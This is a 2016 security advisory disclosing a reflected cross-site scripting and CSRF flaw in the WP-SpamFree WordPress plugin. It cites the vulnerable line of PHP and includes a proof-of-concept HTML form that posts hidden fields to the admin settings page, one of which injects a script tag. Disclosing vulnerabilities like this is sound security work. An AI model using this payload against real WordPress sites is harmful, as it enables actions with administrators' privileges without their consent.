------------------------------------------------------------------------
Cross-Site Scripting vulnerability in WP-SpamFree Anti-Spam WordPress
Plugin
------------------------------------------------------------------------
Radjnies Bhansingh, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A reflected Cross-Site Scripting vulnerability exists in the WP-SpamFree
Anti-Spam WordPress plugin. This vulnerability allows an attacker to
perform any action with the privileges of the target user. The affected
code is not protected with an anti-Cross-Site Request Forgery token.
Consequently, it can be exploited by luring the target user into
clicking a specially crafted link or visiting a malicious website (or
advertisement).

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0026

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was succesfully tested on the WP-SpamFree Anti-Spam [2]
WordPress Plugin version 2.1.1.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
A reflected Cross-Site Scripting vulnerability exists in the WP-SpamFree
Anti-Spam WordPress plugin. This vulnerability allows an attacker to
perform any action with the privileges of the target user. The affected
code is not protected with an anti-Cross-Site Request Forgery token.
Consequently, it can be exploited by luring the target user into
clicking a specially crafted link or visiting a malicious website (or
advertisement).

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The vulnerability exists in the wp-spamfree.php file on line 6049:

$blacklist_keys_update =
trim(stripslashes($_REQUEST['wordpress_comment_blacklist']));

In order to exploit this issue the target user must click a specially
crafted link or visit a malicious website (or advertisement) and must be
autenticated within WordPress.

In addition the WordPress specific blacklist can be cleared by using the
request below and employing CSRF.		
------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The following proof of concept code demonstrates this issue:
<html>
	<body>
		<form
action="http://<target>/wp-admin/options-general.php?page=wp-spamfree%2Fwp-spamfree.php"
method="POST">
			<input type="hidden" name="submitted_wpsf_general_options"
value="1"/>
			<input type="hidden" name="use_alt_cookie_method" value="on"/>
			<input type="hidden" name="comment_logging_all" value="on"/>
			<input type="hidden" name="enhanced_comment_blacklist" value="on"/>
			<input type="hidden" name="wordpress_comment_blacklist"
value="</textarea><script>alert(1)</script>foo&#13;&#10;bar&#13;&#10;press&#13;&#10;"/>
			<input type="hidden" name="allow_proxy_users" value="on"/>
			<input type="hidden" name="promote_plugin_link" value="on"/>
			<input type="hidden" name="submit_wpsf_general_options"
value="Update&#32;Options&#32;Â&#37;B"/>
			<input type="submit"/>
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_wp_spamfree_anti_spam_wordpress_plugin.html
[2] https://wordpress.org/plugins/wp-spamfree/